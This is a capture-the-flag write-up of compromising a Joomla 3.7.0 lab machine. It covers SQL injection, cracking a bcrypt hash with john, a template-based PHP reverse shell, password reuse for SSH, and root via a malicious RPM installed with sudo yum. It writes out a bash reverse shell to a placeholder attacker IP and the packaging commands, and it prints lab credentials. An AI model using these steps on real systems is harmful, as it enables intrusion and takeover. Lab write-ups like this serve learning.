Time: 6 hours
Hint taken: 0
I accessed the web server. This is a blog-like application showing an item that “Spider-man” rob the bank.
Looking at the HTML, it shows that Joomla! is being used.
At first look, I am trying to find the Joomla! version in the web pages – but does not seems to have the info.
I googled for more information and found out that we can see the Joomla! version by looking at the language.
I tried navigating all the directories in robots.txt. The /administrator was promising because it shows an admin panel.
But I need to find the credentials for Super User first.
- ssh (22)
- http (80)
- mysql (3306)
It seems like the main attack vectors are the web server and database.
Gaining Foothold (1)
I tried a few SQL Injection payload in user login feature. But it does not work.
So I googled for exploit for Joomla! 3.7.0
Note: This requires python2
Found table:', 'fb9j5_users') Found user', ['811', 'Super User', 'jonah', 'email@example.com', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']) (' - Extracting sessions from', 'fb9j5_session')
I will need to crack the password. First, I try to see what is the hash algorithm used for the password using online hash identifier (https://hashes.com/en/tools/hash_identifier)
I tried to use john to crack the password:
john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt jonah.txt
So the password is spiderman123
I login on as jonah in the admin panel.
Getting Reverse Shell from Joomla!
This took more time.
After googling, I discover that we can change the
index.php file in the template to php reverse shell.
Gaining Foothold (2)
I struggle to find the user flag manually. So I decided to run some Linux Enumeration scripts.
I used python command to spawn:
python -c 'import pty; pty.spawn("/bin/sh")'
I went through my Linux PE checklist and none of the checks is working.
I saw we have an account:
In addition, I tried to check a few things:
- Trying all the SUID binaries to see if I can escalate privileges -> Doesn’t work
- Looking for Kernel Exploits -> Doesn’t work
Then during the linpeas enumeration, I saw a database password was discovered.
- Test if mysql has any exploit and whether it is running as root -> Doesn’t work
- I tried to login as root:
mysql -u root -p -D joomla
- But there are nothing useful there.
- I tried to login as root:
- I tried looking for Linux exploits and sudo exploits -> Doesn’t work
- No progress. I am going to login as jjameson in SSH. I tried bruteforcing but it does not work.
How I realize my mistakes?
At this point, I have not made any progress other than finding the database password.
MYSQL Password user: root pw: nv5uz9r3ZEDzVjNu
So I read through the checklist of other hackers.
This helps alot: https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_-_linux.html
I realized my mistake. I should check if the discovered passwords are being reused for SSH and not rely on brute-forcing only.
SSH – Login Checks Methodology
- Check if whether the known passwords are reused? Do this for every new password discovered during enumeration
- If not, then try to bruteforce.
I took 4 hours to figure out that the database password is reused as
jjameson ssh password.
Now I can login as jjameson.
The first thing I do is to run
I saw that this account can run sudo yum.
Good article: https://medium.com/@klockw3rk/privilege-escalation-how-to-build-rpm-payloads-in-kali-linux-3a61ef61e8b2
First I need to install fpm and rpm.
git clone https://github.com/jordansissel/fpm cd fpm sudo gem install fpm sudo apt-get install rpm
Then create a root.sh file with the payload:
#!/bin/bash bash -i >& /dev/tcp/[ATTACKER IP]/3333 0>&1
Then create the package with root.sh:
fpm -n root -s dir -t rpm -a all --before-install root.sh .
Start a nc listener at port 3333.
Download the package in the target machine and install:
sudo yum localinstall -y [package name].rpm
In the listener, we will receive connection as root user.